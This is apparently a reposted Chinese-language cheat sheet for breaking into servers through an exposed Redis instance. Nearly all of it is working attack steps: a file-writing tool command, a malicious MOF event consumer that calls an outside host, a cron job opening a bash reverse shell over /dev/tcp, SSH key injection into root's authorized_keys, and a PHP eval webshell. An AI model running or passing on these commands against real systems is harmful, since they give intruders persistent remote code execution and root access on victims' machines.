工具下载地址:
https://github.com/r35tart/RedisWriteFile
执行如下命令:
python2 RedisWriteFile.py --rhost=目标ip --rport=目标端口 --lhost=本机ip --lport=本机端口 --rpath="目标路径" --rfile="目标文件名" --lfile="本机文件名"(目标机和本机能通信)
1、写入webshell
2、写入用户启动项
C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
还需要用户的重启
3、劫持(高权限)
系统DLL劫持
重写C:\windows\system32\setch.exe粘贴键(需要开放3389端口)
4、mof(针对03的机器)
写入以下文件:C:/windows/system32/wbem/mof/nullevt.mof
内容如下:
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"ping sfas.g9bubn.ceye.io \")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
在服务上监听
nc -lvvp 8888
在redis上执行
root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set xx "\n* * * * * bash -i >& /dev/tcp/监听的ip/8888 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
生成私钥对
ssh-key -t rsa
将id_rsa.pub写入缓冲
(echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt#这样做的目的是前后用\n换行,避免和redis里其他缓存数据混合。
cat key.txt |redis-cli -h 192.168.0.114 -x set crack
连接目标redis
redis-cli -h 192.168.0.114
通过redis执行如下命令
config set dir /root/.ssh
config set dbfilename authorized_keys
save
config set dir /home/kali/Desktop
config set dbfilename shell.php
set 1 "<?php @eval($_POST[‘fuck‘]);?>"
save
原文:https://www.cnblogs.com/sakura521/p/14969440.html